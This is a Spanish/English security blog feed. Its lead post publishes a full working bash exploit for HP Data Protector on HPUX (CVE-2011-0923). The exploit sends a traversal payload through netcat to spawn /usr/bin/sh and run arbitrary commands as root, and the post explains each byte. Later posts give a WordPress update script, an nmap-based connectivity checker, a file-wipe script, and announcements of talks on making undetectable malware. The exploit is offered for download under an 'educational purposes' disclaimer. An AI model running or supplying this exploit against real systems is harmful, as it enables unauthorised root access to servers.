H4CKarandas » Seguridad

HP Data Protector Remote Shell for HPUX

Ch0ks — Fri, 05 Aug 2011 04:13:31 +0000

In many pentest that I have done, HPUX is one of the more commons UNIX OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the Lights Out functionality I just fall in love. Al thought many companies uses it for running their main part of their business I have found the they don’t pay much attention on it’s security so it’s common to find production servers without patches or even running applications on insecure protocols like Telnet, FTP or even rlogin.

Since HPUX has been around for a long time and HP was concerned about its security he created the project Bastile for HPUX. I had used it to secure servers and I can say that it’s great! You have to be really careful because it closes a lot of stuff and it may, no sorry, it will broke the connectivity with your oldest applications. ( by the way, it moves the users hashes to the /tcb/files/auth/ folder ). This doesn’t mean you just run tomorrow, apply the Bastille on your servers and forget about them… YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-

So this week I was working in a Pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed, it wasn’t looking so good. Looking around I found that Data Protect has this nasty vulnerability and that fdisk has created a PoC for this Zero Day but in Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project that you can see in his blog) the server was compromised with root…. w00t w00t!

So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don’t own. You can also download it from my Hacking Projects section

#!/bin/bash # Exploit Title: HP Data Protector Remote Shell for HPUX # Date: 2011-08-02 # Author: Adrian Puente Z. # Software Link:http://www8.hp.com/us/en/software/software- # product.html?compURI=tcm:245-936920&pageTitle=data-protector # Version: 0.9 # Tested on: HPUX # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/ # Document.jsp?objectID=c02781143 # # Powered by Hackarandas www.hackarandas.com # Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks # Lots of thanks to David Llorens (@c4an) for all the help. # Ported to HPUX from fdisk's (@fdiskyou) Windows version. # Windows version: http://www.exploit-db.com/exploits/17339/ # # Shouts to shellhellboy, r3x, r0d00m, etlow, # psymera, nitr0us and ppl in #mendozaaaa #


[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` 
 \n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)

" && exit 0

HOST=`echo ${@} | awk '{print $1}'` PORT=`echo ${@} | awk '{print $2}'` CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'` SC="" SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d" SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68" SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d" SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30" SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d" SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30" SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00" SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00" SHELLCODE=${SC} ( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

This script is in Bash and can run in any Linux like Backtrack or in Windows using Cygwin and this is how it works:

The shellcode is 168 bytes and is injected directly on the port. The first 8 bytes of the 104 bytes of this shellcode is part of the protocol where we use the flag “C 20″ to tell Data Protect (I found that if we manipulates this value other things can be accomplished even writing directly to / ) to perform the vulnerable function that allows remote connections and execute files within it’s local bin directory.

"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d" "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68" "\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d" "\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30" "\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d" "\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30" "\x74\x2d\x00\x20\x30\x00\x20\x30\x00"

but if we use the Directory Path Traversal technique we can execute any binary within the file system. The next part was tricky, I can execute any command but I am unable to pass arguments directly to it, so after some debug I found I can spawn a /usr/bin/sh closing it with some nullbytes to get the complete 168 bytes and if I concatenates the command to execute it will pass directly to the shell and execute it with the user’s environment variables, in this case root, and returns us the output.

"\x20\x2e\x2e\x2f\x2e\x2e\x2f" "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" "\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00"

So at the end I get this to work doing this:

( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

The Netcat helps me to transports the shellcode to the port and it returns the output. It simply works.

So special thanks to fdisk for the PoC and David Llorens for the useful brainstorming, he also ported this tool to the Metasploit Project that you can see in his blog.

Adrian Puente Z.

Updating your WordPress Blog in a blink!

Ch0ks — Wed, 30 Mar 2011 03:49:18 +0000

I know, I know… WordPress already has an option to update your blog with one click… but I love to use my SSH and I don’t trust FTP connections, so here is my manual solution for this. I hope you find it useful.

ssh myblog.com
./updateblog.sh
exit

That’s it, pretty fancy uh? This is the code for this script:

#!/bin/bash
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

# This is the absolute PATH to a working directory.
UPGRADEPATH="/home/user/mytempdir/"
# Where the Blog is installed.
BLOGPATH="/home/user/complete/path"
# The complete URL to the blog.
BLOGURL="www.myblog.com/complete/path"
# For spanish version use this line.
NEWWP=`curl -q http://es.wordpress.org/ 2>/dev/null| grep download-tar | cut -d‘"’ -f4`
# For english version use this line
#NEWWP="http://wordpress.org/latest.tar.gz"

echo -n "Downloading ${NEWWP}, is this ok? [y/N] "
read -n 1 OK
echo
if [ ${OK} == "n" ]
then
echo Exiting…
exit 0
fi

cd ${UPGRADEPATH}
echo Downloading new WP…
wget ${NEWWP} -O- | tar zxf –
if [ $? -ne 0 ]
then
echo "Problem found downloading latest release."
echo "Exiting…"
exit 1
fi

echo Deleting old wp-admin and wp-includes..
echo -n "is this ok [y/N] "
read -n 1 OK
echo
if [ ${OK} == "n" ]
then
echo Exiting…
exit 0
fi

rm -fr ${BLOGPATH}/wp-admin
rm -fr ${BLOGPATH}/wp-includes

echo -n "Copying new files…i "
cp -r wordpress/* ${BLOGPATH}
rm -fr wordpress/
echo Done
echo Now go to this URL to update database..
echo -e "${BLOGURL}/wp-admin/upgrade.php"
echo Bye.
exit 0

You just need to change the variables according to your blog needs, each one is commented to best understanding and don’t forget to give execution access. This script has only been tested on Linux and you should only keep it inside your home not in the www or http folder to avoid that someone read it.

You can download it here under your own risk and don’t forget to check my other projects here.

Any comment or doubt leave me a comment and I will try to reply it asap.

Adrian Puente Z.

Adrian Puente Z., Hackarandas, ssh, blog, update, wordpress

Conferencia HUM – BugCon2010

Ch0ks — Thu, 28 Oct 2010 05:06:31 +0000

Quiero invitarlos a mi conferencia de HUM – Homemade Undetectable Malware que voy a dar en la BugCon2010 este viernes 29 de octubre del 2010. Es parte de lo que dí en la conferencia del ITESM pero voy a agregarle mas contenido y espero ahora si me salgan los demos. Jojojo.

No dejen de ir, hoy inició el congreso pero promete mucho y siempre es padre conocer gente del underground y profesionales de la seguridad informática. Un agradecimiento a Vendetta por facilitar el día de la conferencia y allá nos vemos.

Cómo llegar:

Centro Formación e Innovación Educativa (CFIE): Av. Wilfrido Massieu sin número esquina con Luis Enrique Erro Unidad Profesional “Adolfo López Mateos”, Zacatenco.

La forma más fácil de llegar desde el sur es tomar todo Insurgentes hacia el norte y salir en Av. Montevideo, en Montevideo llegar hasta el cruce con Av. Instituto Politécnico Nacional, seguir por Av. Politécnico y a una calle empieza Wilfrido Massieu allí lo reconoceran por que empiezan las rejas guindas del IPN. Seguir por Wilfrideo Massieu, lo más característico es el planetario que se distingue por ser esférico del techo, el edificio al lado es el CFIE, lo reconoceran por una pirámide de cristal que tiene en el techo en el frente hay una mantonta azul con la catarina.

Si es en transporte público lo más fácil es llegar a Metro Lindavista o Metro Politécnico, de Metro Lindavista pueden tomar un taxi deben ser como $10, de Metro Politécnico tendrían que caminar como 10 min por que la avenida es en sentido contrario.

El mapísima obligatorio.

View BugCon2010 in a larger map

Adrián Puente Z.

Technorati Tags: BugCon2010 hackarandas Adrian Puente Z. HUM Homemade Undetectable Malware conferencia

Conferencia: HUM – Homemade Undetectable Malware

Ch0ks — Fri, 27 Aug 2010 05:10:53 +0000

Tengo el gusto de anunciarles que el Profesor Arturo García conocido en el Twitter cómo @ElProfeSeguro, me ha invitado a dar una conferencia sobre HUM o Homemade Undetectable Malware en el ITESM CCM.

No quiero adelantar mucho de la conferencia pero platicaré de mi experiencia creando malware indetectable cómo estos se propagan y describiré las herramientas que utlilizo cómo el Metasploit y el Social Engineer Toolkit en las pruebas de penetración que realizo y cómo las combino con el Malware para mayor efectividad.

Fecha: Martes 31 de agosto de 2010

Hora: 19:00 hrs

Duración: 90 minutos

Lugar: ITESM CCM, Aula Magna 1. Primer piso. Aulas II.

Entrada libre y gratuita.

Cómo llegar:

Espero verlos por ahi y un agradecimiento a Arturo García y al ITESM CCM por la invitación y las facilidades para dar la conferencia.

ACTUALIZACION

Disfruté mucho dar la conferencia y un grupo muy participativo, realmente la pasé bien y tuve el gusto de conocer a @Paco_ dueño del interesante blog Hacking MX. Gracias a todos los que fueron y a quieren me invitaron y la presentación se las dejo en la sección de artículosdentro de mi blog o lo pueden descargar de la siguiente liga:

HUM: Homemade Undetectable Malware

Adrián Puente Z.

Technorati Tags: Adrian Puente Z., itesm ccm, hackarandas, malware, SET, metasploit, antivirus, undetectable, arturo garcia, elprofeseguro

Can I reach it? Small Script for Network Connectivity Test

Ch0ks — Mon, 23 Aug 2010 15:00:30 +0000

I made this script so I can replicate a network connection test to some host. It’s really small but it works in all the cases and has some nice features as internal and external IP detection. It works in Linux, ideal for a pentest using Backtrack.

Here is the Bash code.

#!/bin/bash
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

[ `id -u` -ne 0 ] && echo "Only root can do that! sudoing…"
if [ "$EUID" != 0 ]; then sudo `which $0` $@; exit; fi

[ $# -eq 0 ] && echo "Syntax: `basename $0` " && exit 0

# Setting the host from the first argument.
HOST=$1
# Maximun hops for traceroute.
HOPS=15
# Maximun packet for ping.
PCOUNT=3

IFACE=`route -vn | grep UG | sed ‘s/\ \ */\ /g’ | cut -d‘ ‘ -f8`
INTIP=`ifconfig ${IFACE} | grep "inet addr" | tr ‘ ‘ ‘:’ | cut -d‘:’ -f13`

# Choose the method you like most.
#EXTIP=`lynx –source http://www.whatismyip.org`
#EXTIP=`wget -q http://www.whatismyip.org -O-`
EXTIP=`curl -q http://www.whatismyip.org 2>/dev/null`

echo "— Internal IP: ${INTIP} —"
echo "— External IP: ${EXTIP} —"
echo -e "\n— Pinging…\n"
ping -c ${PCOUNT} ${HOST}
echo -e "\n— Doing traceroute…\n"
traceroute -m ${HOPS} ${HOST}
echo -e "\n— Checking open ports…\n"
nmap -sSV -PN ${HOST}
echo -e "\n— Test finished…"

You can change the parameters to fit your needs.

Here is an example.

–.^ (ch0ks@xipe)*(18:30:27)*(bin) ^.–
-=:)> checkconnection.sh www.google.com
Only root can do that! sudoing…
— Internal IP: 192.168.11.5 —
— External IP: A.B.C.D —

— Pinging…

PING www.l.google.com (74.125.95.106) 56(84) bytes of data.
64 bytes from iw-in-f106.1e100.net (74.125.95.106): icmp_seq=1 ttl=51 time=67.2 ms
64 bytes from iw-in-f106.1e100.net (74.125.95.106): icmp_seq=2 ttl=51 time=65.8 ms
64 bytes from iw-in-f106.1e100.net (74.125.95.106): icmp_seq=3 ttl=51 time=66.3 ms

— www.l.google.com ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 65.895/66.490/67.223/0.626 ms

— Making traceroute…

traceroute to www.google.com (74.125.95.103), 15 hops max, 60 byte packets
1 leviatan (192.168.11.250) 1.385 ms 1.465 ms 1.492 ms
2 201.159.131.205 (A.B.C.D) 5.463 ms 5.511 ms 5.519 ms
3 192.168.1.98 (192.168.1.98) 5.648 ms 5.710 ms 5.970 ms
4 customer-58.xertix.com (201.159.136.58) 6.000 ms 6.067 ms 6.208 ms
5 na-200-78-191-129.static.avantel.net.mx (200.78.191.129) 8.204 ms 8.264 ms 8.456 ms
6 dial-200-39-225-125.zone-1.ip.dial.net.mx (200.39.225.125) 8.617 ms 6.470 ms 6.654 ms
7 pos1-0.cr02.mca01.pccwbtn.net (63.218.161.69) 20.646 ms 20.614 ms 20.039 ms
8 TenGE12-1.br02.dal01.pccwbtn.net (63.218.22.82) 303.761 ms * *
9 google.tenge11-4.br02.dal01.pccwbtn.net (63.218.23.118) 33.544 ms 34.331 ms 34.501 ms
10 72.14.233.85 (72.14.233.85) 61.329 ms 72.14.233.77 (72.14.233.77) 61.388 ms 61.520 ms
11 216.239.47.121 (216.239.47.121) 69.114 ms 69.800 ms 69.511 ms
12 209.85.253.173 (209.85.253.173) 68.657 ms 209.85.255.223 (209.85.255.223) 67.482 ms 209.85.253.173 (209.85.253.173) 68.568 ms
13 209.85.241.29 (209.85.241.29) 66.212 ms 66.150 ms 66.263 ms
14 iw-in-f103.1e100.net (74.125.95.103) 65.803 ms 65.757 ms 65.991 ms

— Checking open ports…

Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-20 18:31 CDT
Warning: Hostname www.google.com resolves to 6 IPs. Using 74.125.95.104.
Interesting ports on iw-in-f104.1e100.net (74.125.95.104):
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
80/tcp open http Google httpd 2.0 (GFE)
113/tcp closed auth
443/tcp open ssl/http Google httpd 2.0 (GFE)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.81 seconds

— Test finished…

I hope you liked and helped. You can also visit other scripts and projects I have here. And please, leave your comments.

Adrián Puente Z.

Adrian Puente Z., Hackarandas, Security, Network Test, ping, traceroute

Uncomplicated File Wipe for *NIX

Ch0ks — Wed, 18 Aug 2010 01:59:02 +0000

We needed to guarantee to one of our customers that a file will be securely deleted. Since the server was a HPUX Unix and we can’t compile nor install new applications, I managed to write this script to wipe the file.

The file is overwritten 7 times as the US Department of Defense clearing standard DoD 5220.22-M specifies and renamed another 7 times before being deleted. It is written for the KSH shell as many UNIX has it by default. It doesn’t run in bash but you can edit it to fit your needs.

Here is the code:

#!/usr/bin/ksh
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

# US Department of Defense clearing standard DOD 5220.22-M (ECE)
PASES=7
# Device to overwrite the file.
# Can be:
# /dev/random
# /dev/urandom
# /dev/zero (less secure, overwritten with zeros)
RANDEV=/dev/urandom
NAME=$$
COUNT=0
FILE=$1

if [[ $# -eq 0 ]];then
print "Syntax: $0 "
exit 1
fi

if [[ ! -f $FILE ]]
then
print "File $FILE doesn’t exists"
exit 1
fi

if [[ ! -w $FILE ]]
then
print "Can’t write on file $FILE"
exit 1
fi

SIZE=$(ls -l $FILE | cut -d‘ ‘ -f5)

print -n "About to wipe file: $FILE are you sure? \"N/y\": "
read answer
print ""

if [[ ! ( $answer = ‘y’ || $answer = ‘Y’ ) ]]
then
print "Command canceled."
exit 0
fi

while [[ $COUNT -lt $PASES ]];do
(( COUNT += 1 ))
print "Pass number: $COUNT"
dd if=$RANDEV of=$FILE bs=$SIZE count=1
done

COUNT=0
echo "Renaming…"

while [[ $COUNT -lt $PASES ]];do
(( COUNT += 1 ))
(( NAME += "$NAME$COUNT" ))
mv -v $FILE $NAME
FILE=$NAME
done

rm -v $FILE
FILE=$1
echo File: $FILE deleted.
exit 0

The syntax is simple:

–.^ (ch0ks@xipe)*(20:38:05)*(~) ^.–
-=:)> uncomplicatedwipe.ksh
Syntax: uncomplicatedwipe.ksh

You can follow this commands to test the script:

hexdump /dev/urandom > foo.txt
#after some seconds press CTRL+C

Now we wipe the file

–.^ (ch0ks@xipe)*(20:36:00)*(tmp) ^.–
-=:)> uncomplicatedwipe.sh foo.txt
About to wipe file: foo.txt are you sure? "N/y": y

Pass number: 1
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 4.01637 s, 3.9 MB/s
Pass number: 2
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.87637 s, 4.0 MB/s
Pass number: 3
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 5.451 s, 2.8 MB/s
Pass number: 4
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 4.48904 s, 3.4 MB/s
Pass number: 5
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.88731 s, 4.0 MB/s
Pass number: 6
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.98379 s, 3.9 MB/s
Pass number: 7
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.2128 s, 4.8 MB/s
Renaming…
`foo.txt‘ -> `69257′
`69257‘ -> `761829′
`761829‘ -> `8380122′
`8380122‘ -> `92181346′
`92181346‘ -> `1013994811′
`1013994811‘ -> `11153942927′
`11153942927‘ -> `122693372204′
removed `122693372204‘
File: foo.txt deleted.

In the next release I will make a recursive version for directories and you can visit my other projects here.

Troubleshoot: Some Unix systems doesn’t have /dev/urandom device so you can play with the RANDEV variable to use the one you have.

Update: Some versions of HPUX doesn’t have /dev/[u]random so you can use as a desperate alternative the /dev/zero device. I found in a forum that some versions of HPUX doesn’t have the /dev/zero device so you can create it with this command:

#!/bin/sh

# major/minor for HPUX 11.X
mknod /dev/zero c 3 4
chown bin:bin /dev/zero
chmod 666 /dev/zero

Adrián Puente Z.

hackarandas, wipe, Adrian Puente Z., security, Secure Delete, unix, security, seguridad, ksh code

Infographic: Phishing for Your Money

Ch0ks — Wed, 30 Jun 2010 15:00:47 +0000

Here again with another infographic I found, now on Phishing. I hope you like it as much as I do.

Technorati Tags:hackarandas, adrian puente z., infographic, phishing, gobankingrates.com
Generated By Technorati Tag Generator

Sources:
* http://www.gobankingrates.com/banking/protect-yourself-from-phishers-infographic/
* http://www.trusteer.com/sites/default/files/Phishing-Statistics-Dec-2009-FIN.pdf
Adrián Puente Z.

Infographic: A Short Story on Hacking

Ch0ks — Fri, 25 Jun 2010 17:03:11 +0000

I found this great infographic about hacking and I thought in sharing it. I hope you found it as interesting as I did.

Via: Online MBA

Technorati Tags:hackarandas, adrian puente z., infographic, online mba, hackers
Generated By Technorati Tag Generator

Adrián Puente Z.

SSH Hacking and Good Practices

Ch0ks — Fri, 11 Jun 2010 15:00:20 +0000

I got to confess that I am a big podcast fan and one I am fond of is PaulDotCom – Security Weekly (I also hear it while I am jogging) So when I read in the blog the Mark Baggett’s post: Capturing SSH V1 & V2 Credentials with a MitM ssh honeypot I just feel like “I have to try it”. So I did and wrote this presentation for Sm4rt Security Services’ Tech Day, but I wanted to go further so I wrote it in a way that can be useful for the Pentesters and the Information Security Officers in the company.

In the first part I talk about some basic concepts about SSH then I got for the hacking part so I give a demonstration based on the Mark Baggett’s post and I finish giving come SSH security tips based on my experience and some articles I found on Internet. I hope you found it interesting.

You can download it from here:

SSH Hacking and Good.Practices by Adrian Puente Z. (PDF Presentation)

Please visit my other Hacking Projects o Security Articles.

If you have something valuable to add to this presentation, please leave your comment.

References:

Adrián Puente Z.

Technorati Tags:
Adrian Puente Z. hackarandas SSH hacking Man in the Middle Best Practices Security

BugCON Security Conference 2010

Ch0ks — Thu, 22 Apr 2010 06:12:49 +0000

Translate to English

BugCON Security Conference es un evento de seguridad meramente técnico en donde los mas importantes investigadores del área muestran sus últimos descubrimientos.

En la edición 2008 BugCON fue catalogado como el evento de cómputo con nivel mas alto en todo México, por encima de congresos y eventos similares. En 2009 se llego a mas de 2800 asistentes, 30 conferencias, 11 talleres y 2 competencias.

Este año BugCON celebra su tercer edición del 26 al 28 de Octubre en instalaciones del Instituto Politécnico Nacional en México D.F.

El Call For Papers cierra en Agosto, al igual que el deadline para patrocinadores. Si requieres más información puedes escribir a cualquiera de los organizadores o visitar el sitio web www.bugcon.org

No te lo puedes perder

—
Armin García López
Presidencia
darknight _AT_ bugcon _DOT_ org

Carlos A. Lozano Vargas
Fundador
vendetta _AT_ bugcon _DOT_ org

Alejandro Hernández Flores
Organizador Técnico
alt3kx _AT_ bugcon _DOT_ org

Añadelo a tus eventos en Facebook!

http://www.facebook.com/event.php?eid=119998731350362

Adrián Puente Z.